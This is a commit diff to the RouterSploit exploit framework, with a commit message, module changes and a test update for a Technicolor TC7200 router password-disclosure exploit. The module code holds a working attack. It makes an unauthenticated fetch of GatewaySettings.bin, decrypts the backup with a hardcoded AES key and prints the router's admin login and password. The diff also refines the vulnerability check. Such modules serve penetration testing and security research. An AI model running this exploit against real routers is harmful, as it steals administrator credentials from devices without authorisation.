tc7200_password_disclosure_v2: fix vulnerability check and wrong pycrypto call (#406)

* Fix vulnerability check in tc7200_password_disclosure_v2

Use an encrypted zero block to identify the binary settings backup data.

* Make tc7200_password_disclosure_v2 compatible with new pycrypto

The decryption routine uses AES in ECB mode. The pycrypto module is used for this routine. ECB does not involve any initialization vector (IV). However routersploit uses one that is 16 NUL bytes. Older pycrypto versions just ignored this, but newer versions (at least since 2.6) error on using an IV with ECB.

* tc7200_password_disclosure_v2: adapt test to the binary check

* add missing import

routersploit/modules/exploits/routers/technicolor/tc7200_password_disclosure_v2.py

@@ -13,6 +13,7 @@ class Exploit(HTTPClient):
         "authors": [
             "Gergely Eberhardt (@ebux25) from SEARCH-LAB Ltd. (www.search-lab.hu)",  # vulnerability discovery
             "0BuRner",  # routersploit module
+            "Bastian Germann",  # improved vulnerability check
         ],
         "references": [
             "https://www.exploit-db.com/exploits/40157/",
@@ -35,10 +36,10 @@ class Exploit(HTTPClient):
             )
             return None
 
-            if response is not None and response.status_code == 200 and "MLog" in response.text:
+            if response is not None and response.status_code == 200:
                 print_status("Reading GatewaySettings.bin...")
 
-                plain = self.decrypt_backup(response.text)
+                plain = self.decrypt_backup(response.content)
                 name, pwd = self.parse_backup(plain)
 
                 print_success('Exploit success! login: {}, password: {}'.format(name, pwd))
@@ -63,7 +64,7 @@ class Exploit(HTTPClient):
     def decrypt_backup(backup):
         key = binascii.unhexlify('000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F')
         l = (len(backup) / 16) * 16
-        cipher = AES.new(key, AES.MODE_ECB, b'\x00' * 16)
+        cipher = AES.new(key, AES.MODE_ECB)
         plain = cipher.decrypt(backup[0:l])
         return plain
 
@@ -74,7 +75,8 @@ class Exploit(HTTPClient):
             path="/goform/system/GatewaySettings.bin",
         )
 
-        if response is not None and response.status_code == 200 and "MLog" in response.text:
+        encr_zero_block = binascii.unhexlify('F29000B62A499FD0A9F39A6ADD2E7780')
+        if response is not None and response.status_code == 200 and encr_zero_block in response.content:
             return True  # target is vulnerable
 
         return False  # target is not vulnerable

tests/exploits/routers/technicolor/test_tc7200_password_disclosure_v2.py

+import binascii
 from routersploit.modules.exploits.routers.technicolor.tc7200_password_disclosure_v2 import Exploit
 
 
 def test_check_success(target):
     """ Test scenario - successful exploitation """
 
+    encrypted_mock = binascii.unhexlify('F29000B62A499FD0A9F39A6ADD2E7780' # encrypted zero block + data from https://www.exploit-db.com/exploits/31894/
+                                       +'c07fdfca294e1a4e4b74dbb2ffb7d2a73a90f00111134dc8d9810a90f2a9bf5862a179a20a9418a486bd4c8170730c8f')
     route_mock = target.get_route_mock("/goform/system/GatewaySettings.bin", methods=["GET"])
     route_mock.return_value = (
-        "TEST"
-        "MLog"
-        "TEST"
+        encrypted_mock
     )
 
     exploit = Exploit()